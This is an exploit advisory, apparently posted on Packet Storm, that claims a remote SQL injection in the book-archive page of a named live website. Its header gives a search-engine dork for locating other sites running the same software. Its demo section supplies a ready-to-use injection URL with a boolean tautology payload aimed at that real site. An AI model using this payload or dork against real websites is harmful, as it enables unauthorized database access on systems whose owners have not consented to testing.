Khamenei.ir suffers from a remote SQL injection vulnerability.
0ade2eca419824b2ce0fa2099f840485ed70eb3df59af6f97f13c77201098c23################################################## ################################################## #####################
# #
# Exploit Title : Khamenei.ir has SQL Inj vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : khamenei.ir (https://farsi.khamenei.ir) #
# #
# Tested ON : Persian language version Host #
# #
# Security Risk : ~[Critical]~ #
# #
# Description : Description: All websites with this version used can be targeted #
# #
# DorK : "intext:"book-archive?nt="" #
# #
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "book-archive"
SQL Inj Expl0iTs :
https://farsi.khamenei.ir/book-archive?nt=99999999 Codes
Dem0 :
https://farsi.khamenei.ir/book-archive?nt=99999999%27 oR 6168693=6168693 aNd %276199%27=%276199
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed